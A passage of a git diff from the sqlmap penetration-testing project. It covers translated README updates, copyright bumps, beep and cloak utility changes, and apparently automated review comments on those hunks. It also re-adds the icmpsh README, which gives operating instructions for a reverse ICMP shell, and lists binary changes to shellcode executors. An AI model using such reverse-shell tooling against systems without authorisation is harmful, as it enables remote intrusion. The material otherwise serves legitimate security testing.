+Inštalácia +---- + +Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme. 
+ +Využitie +---- + +Na získanie zoznamu základných možností a prepínačov, použite: + + python sqlmap.py -h + +Na získanie zoznamu všetkých možností a prepínačov, použite: + + python sqlmap.py -hh + +Vzorku behu nájdete [tu](https://asciinema.org/a/46601). +Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linky +---- + +* Domovská stránka: https://sqlmap.org +* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues +* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki +* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots \ No newline at end of file diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md index f2508202abc..fb2aba28075 100644 --- a/doc/translations/README-tr-TR.md +++ b/doc/translations/README-tr-TR.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır. 
@@ -11,7 +11,7 @@ Ekran görüntüleri ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. +İsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. Kurulum @@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. +sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. Kullanım ---- @@ -48,6 +48,6 @@ Bağlantılar * Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues * Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki * Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-uk-UA.md b/doc/translations/README-uk-UA.md index 6ad8c684e18..26e96f7d6cf 100644 --- a/doc/translations/README-uk-UA.md +++ b/doc/translations/README-uk-UA.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання. 
@@ -20,7 +20,7 @@ sqlmap - це інструмент для тестування вразливо git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap «працює з коробки» з [Python](http://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі. +sqlmap «працює з коробки» з [Python](https://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі. Використання ---- @@ -45,6 +45,6 @@ sqlmap «працює з коробки» з [Python](http://www.python.org/down * Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues * Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki * Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-vi-VN.md b/doc/translations/README-vi-VN.md index 0dbae998992..45cbd33c6c1 100644 --- a/doc/translations/README-vi-VN.md +++ b/doc/translations/README-vi-VN.md 
@@ -1,16 +1,16 @@ # sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng tiêm SQL và tiếp quản các máy chủ cơ sở dữ liệu. Nó đi kèm với -một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện cơ sở dữ liệu, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập tệp của hệ thống và thực hiện các lệnh trên hệ điều hành từ xa. +sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng SQL injection và tiếp quản các máy chủ cơ sở dữ liệu. 
Công cụ này đi kèm với +một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập file hệ thống và thực hiện các lệnh trên hệ điều hành từ xa. Ảnh chụp màn hình ---- ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), chúng trình bày một số tính năng có thể tìm thấy trong wiki. +Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) - nơi trình bày một số tính năng có thể tìm thấy trong wiki. Cài đặt ---- 
@@ -18,25 +18,25 @@ Cài đặt Bạn có thể tải xuống tập tin nén tar mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master). -Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone với [Git](https://github.com/sqlmapproject/sqlmap): +Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone về repo [Git](https://github.com/sqlmapproject/sqlmap): git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap hoạt động hiệu quả với [Python](http://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào. +sqlmap hoạt động hiệu quả với [Python](https://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào. Sử dụng ---- -Để có được danh sách các tùy chọn cơ bản, hãy sử dụng: +Để có được danh sách các tùy chọn cơ bản và switch, hãy chạy: python sqlmap.py -h -Để có được danh sách tất cả các tùy chọn, hãy sử dụng: +Để có được danh sách tất cả các tùy chọn và switch, hãy chạy: python sqlmap.py -hh -Bạn có thể xem video chạy thử [tại đây](https://asciinema.org/a/46601). -Để có cái nhìn tổng quan về các khả năng của sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh). +Bạn có thể xem video demo [tại đây](https://asciinema.org/a/46601). +Để có cái nhìn tổng quan về sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh). Liên kết ---- 
@@ -44,9 +44,9 @@ Liên kết * Trang chủ: https://sqlmap.org * Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Nguồn cấp dữ liệu RSS về commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Theo dõi vấn đề: https://github.com/sqlmapproject/sqlmap/issues +* Theo dõi issue: https://github.com/sqlmapproject/sqlmap/issues * Hướng dẫn sử dụng: https://github.com/sqlmapproject/sqlmap/wiki * Các câu hỏi thường gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md index 77412af78b3..d63d6da4a71 100644 --- a/doc/translations/README-zh-CN.md +++ b/doc/translations/README-zh-CN.md 
@@ -1,26 +1,26 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。 +sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。 演示截图 ---- ![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示 +你可以查看 wiki 上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 了解各种用法的示例 安装方法 ---- -你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 
[这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码. +你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包好的源代码,或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包好的源代码. -推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码: +推荐直接从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上 +sqlmap 可以运行在 [Python](https://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上 使用方法 ---- 
@@ -33,17 +33,17 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6**, **2.7 python sqlmap.py -hh -你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。 +你可以从 [这里](https://asciinema.org/a/46601) 看到一个 sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取 sqlmap 所有支持的特性、参数、命令行选项开关及详细的使用帮助。 链接 ---- * 项目主页: https://sqlmap.org * 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Commit的 RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 问题跟踪器: https://github.com/sqlmapproject/sqlmap/issues * 使用手册: https://github.com/sqlmapproject/sqlmap/wiki * 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/extra/__init__.py b/extra/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/__init__.py +++ b/extra/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/beep/__init__.py +++ b/extra/beep/__init__.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/beep/beep.py b/extra/beep/beep.py index c20ae204303..b6f8f97cf82 100644 --- a/extra/beep/beep.py +++ b/extra/beep/beep.py @@ -3,7 +3,7 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -18,7 +18,7 @@ def beep(): if sys.platform.startswith("win"): _win_wav_play(BEEP_WAV_FILENAME) elif sys.platform.startswith("darwin"): - _mac_beep() + _mac_wav_play(BEEP_WAV_FILENAME) elif sys.platform.startswith("cygwin"): _cygwin_beep(BEEP_WAV_FILENAME) elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")): @@ -40,9 +40,8 @@ def _speaker_beep(): def _cygwin_beep(filename): os.system("play-sound-file '%s' 2>/dev/null" % filename) -def _mac_beep(): - import Carbon.Snd - Carbon.Snd.SysBeep(1) +def _mac_wav_play(filename): + os.system("afplay '%s' 2>/dev/null" % BEEP_WAV_FILENAME) def _win_wav_play(filename): import winsound @@ -50,7 +49,7 @@ def _win_wav_play(filename): winsound.PlaySound(filename, winsound.SND_FILENAME) def _linux_wav_play(filename): - for _ in ("aplay", "paplay", "play"): + for _ in ("paplay", "aplay", "mpv", "mplayer", "play"): if not os.system("%s '%s' 2>/dev/null" % (_, filename)): return diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/cloak/__init__.py +++ b/extra/cloak/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ 
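Review bot: `_mac_wav_play(filename)` in the `@@ -40,9 +40,8 @@` hunk of extra/beep/beep.py ignores its `filename` parameter and formats the module constant `BEEP_WAV_FILENAME` into the command instead. It behaves correctly today only because `beep()` passes that same constant. The body should read `os.system("afplay '%s' 2>/dev/null" % filename)`, matching `_cygwin_beep` and `_linux_wav_play`. The path is also placed between single quotes in a shell string, so an install path containing a quote would break the command; an argument list passed to `subprocess.call` would avoid the shell, though whether `subprocess` is imported in this file is not visible from the hunk.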
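Review bot: The `mpv` and `mplayer` entries added to the player tuple in `_linux_wav_play` (hunk `@@ -50,7 +49,7 @@`) run with only stderr redirected, and both players normally write banner and track information to stdout. That output would probably land in the middle of the tool's console output every time the beep fires. Redirecting both streams, `"%s '%s' >/dev/null 2>&1" % (_, filename)`, keeps the fallback chain silent. A short comment saying why `paplay` is now tried before `aplay` would also help; the rest of the function body lies outside the hunk.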
diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index b76146a51ff..cce563973c5 100644 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -3,7 +3,7 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -21,7 +21,7 @@ xrange = range ord = lambda _: _ -KEY = b"ENWsCymUeJcXqSbD" +KEY = b"E6wRbVhD0IBeCiGJ" def xor(message, key): return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message))) diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/dbgtool/__init__.py +++ b/extra/dbgtool/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index 9ebc30807ec..d8f93d41ff1 100644 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -3,7 +3,7 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/icmpsh/README.txt b/extra/icmpsh/README.txt index 631f9ee377f..d09e83b8552 100644 --- a/extra/icmpsh/README.txt +++ b/extra/icmpsh/README.txt 
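Review bot: The replaced `KEY` constant in extra/cloak/cloak.py has no comment stating what depends on it. `xor()` on the next line applies it as a repeating-key XOR, so this is obfuscation with a key that is public in the repository, and the module docstring's "encryption" overstates what it provides. Files cloaked with the previous key will not decode with the new one; the binary `*_` files listed as changed later in this diff were presumably regenerated, but nothing in the hunk records that requirement. I would add `# NOTE: fixed, public XOR key (obfuscation only); changing it requires re-cloaking every bundled '_' file` above the assignment.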
@@ -1,45 +1,45 @@ -icmpsh - simple reverse ICMP shell - -icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. - - ---- Running the Master --- - -The master is straight forward to use. There are no extra libraries required for the C version. -The Perl master however has the following dependencies: - - * IO::Socket - * NetPacket::IP - * NetPacket::ICMP - - -When running the master, don't forget to disable ICMP replies by the OS. For example: - - sysctl -w net.ipv4.icmp_echo_ignore_all=1 - -If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive -commands send from the master. - - ---- Running the Slave --- - -The slave comes with a few command line options as outlined below: - - --t host host ip address to send ping requests to. This option is mandatory! - --r send a single test icmp request containing the string "Test1234" and then quit. - This is for testing the connection. - --d milliseconds delay between requests in milliseconds - --o milliseconds timeout of responses in milliseconds. If a response has not received in time, - the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. - The counter is set back to 0 if a response was received. - --b num limit of blanks (unanswered icmp requests before quitting - --s bytes maximal data buffer size in bytes - - -In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. +icmpsh - simple reverse ICMP shell + +icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. + + +--- Running the Master --- + +The master is straight forward to use. There are no extra libraries required for the C version. +The Perl master however has the following dependencies: + + * IO::Socket + * NetPacket::IP + * NetPacket::ICMP + + +When running the master, don't forget to disable ICMP replies by the OS. 
For example: + + sysctl -w net.ipv4.icmp_echo_ignore_all=1 + +If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive +commands send from the master. + + +--- Running the Slave --- + +The slave comes with a few command line options as outlined below: + + +-t host host ip address to send ping requests to. This option is mandatory! + +-r send a single test icmp request containing the string "Test1234" and then quit. + This is for testing the connection. + +-d milliseconds delay between requests in milliseconds + +-o milliseconds timeout of responses in milliseconds. If a response has not received in time, + the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. + The counter is set back to 0 if a response was received. + +-b num limit of blanks (unanswered icmp requests before quitting + +-s bytes maximal data buffer size in bytes + + +In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_ index 0944508047e..a909351bdac 100644 Binary files a/extra/icmpsh/icmpsh.exe_ and b/extra/icmpsh/icmpsh.exe_ differ diff --git a/extra/runcmd/runcmd.exe_ b/extra/runcmd/runcmd.exe_ index 26448b5dcb1..556eabb7be0 100644 Binary files a/extra/runcmd/runcmd.exe_ and b/extra/runcmd/runcmd.exe_ differ diff --git a/extra/shellcodeexec/linux/shellcodeexec.x32_ b/extra/shellcodeexec/linux/shellcodeexec.x32_ index 4d050d0c19a..c0857d971f5 100644 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x32_ and b/extra/shellcodeexec/linux/shellcodeexec.x32_ differ diff --git a/extra/shellcodeexec/linux/shellcodeexec.x64_ b/extra/shellcodeexec/linux/shellcodeexec.x64_ index 4bc2367a4fb..13ef7522987 100644 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x64_ and b/extra/shellcodeexec/linux/shellcodeexec.x64_ differ 
diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ index 7c19a51b45e..0cbe5404fce 100644 Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh index 236638bbe5d..147333b29ec 100755 --- a/extra/shutils/blanks.sh +++ b/extra/shutils/blanks.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Removes trailing spaces from blank lines inside project files diff --git a/extra/shutils/drei.sh b/extra/shutils/drei.sh index cbd907f3555..99bccf5c8d7 100755 --- a/extra/shutils/drei.sh +++ b/extra/shutils/drei.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Stress test against Python3 diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py index afdd130d16e..ac3caf88dee 100755 --- a/extra/shutils/duplicates.py +++ b/extra/shutils/duplicates.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Removes duplicate entries in wordlist like files diff --git 